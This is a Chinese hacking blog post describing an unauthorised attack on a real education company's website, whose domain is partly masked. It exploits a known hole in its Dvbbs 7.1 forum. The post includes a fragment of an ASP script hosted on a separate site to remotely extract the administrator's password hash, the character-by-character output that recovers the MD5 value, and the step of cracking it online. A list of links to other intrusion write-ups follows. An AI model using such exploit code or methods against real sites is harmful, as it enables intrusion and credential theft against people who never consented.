|
[组图]手工检测某天IT教育集团网站
看到有论坛,进去看眼吧!Powered By Dvbbs Version 7.1.0 Sp1 ,看到这个版本后心情豁然开朗,因为具自己所知该版本存在漏洞的说.
OK,现日了一个小站,用来放远程读取论坛管理员密码程序,通过踩点确定了路径该为http://www.51xxxxxxxxx.com/52network/boke.asp 而管理员大致确定为windecember ,谁叫看着这个名字熟悉那,(网站后台用户不就是他......) 嘿嘿,编辑程序远程读取吧!程序代码如下:
| 以下是引用片段: <br><br> <br><br> <center> <div align='left' style="width:500px;font-size:12px;"> <% Server.ScriptTimeout=300 Response.Buffer = True Dim hehefulsh Dim charhex,OpenURL,templen,tempstr,newgetlen,theoffset,theURL,TheUser Set hehefulsh = CreateObject("Microsoft.XMLHTTP") charhex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",") tempstr="" for total=0 to 15 |
保存在一个小站根目录下命名为ak.asp ,然后IE访问,读取.........
PS:严重鄙视Sun.Li这小子,风风火火的骂着闯进了群,说我不加他进,为了他进我现T了一个人才加进来.群满N久,换个人我容易吗我...黑封说的好:"开你毛会去吧...."哈哈 ,解气....
读取的结果出来了,比想象中快:
前1位MD5值为:a 其他密码正在读取中,请等待。。。
前2位MD5值为:ad 其他密码正在读取中,请等待。。。
前3位MD5值为:adc 其他密码正在读取中,请等待。。。
前4位MD5值为:adc9 其他密码正在读取中,请等待。。。
前5位MD5值为:adc98 其他密码正在读取中,请等待。。。
前6位MD5值为:adc989 其他密码正在读取中,请等待。。。
前7位MD5值为:adc9892 其他密码正在读取中,请等待。。。
前8位MD5值为:adc98924 其他密码正在读取中,请等待。。。
前9位MD5值为:adc98924f 其他密码正在读取中,请等待。。。
前10位MD5值为:adc98924f7 其他密码正在读取中,请等待。。。
前11位MD5值为:adc98924f7b 其他密码正在读取中,请等待。。。
前12位MD5值为:adc98924f7b6 其他密码正在读取中,请等待。。。
前13位MD5值为:adc98924f7b6b 其他密码正在读取中,请等待。。。
前14位MD5值为:adc98924f7b6be 其他密码正在读取中,请等待。。。
前15位MD5值为:adc98924f7b6beb 其他密码正在读取中,请等待。。。
前16位MD5值为:adc98924f7b6beb9 其他密码正在读取中,请等待。。。
成功读取密码的MD5值,为:adc98924f7b6beb9
ok,再次丢给在线破MD5密码的站点查,结果证明了我本善良......希望以本篇文章警醒各网站负责人提高网络安全意识,普及网络安全技术.
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |
| BBSXP2008存在后台注射漏洞 | 02-19 |
| Discuz! 6 后台拿Shell的方法 | 02-17 |
您现在的位置: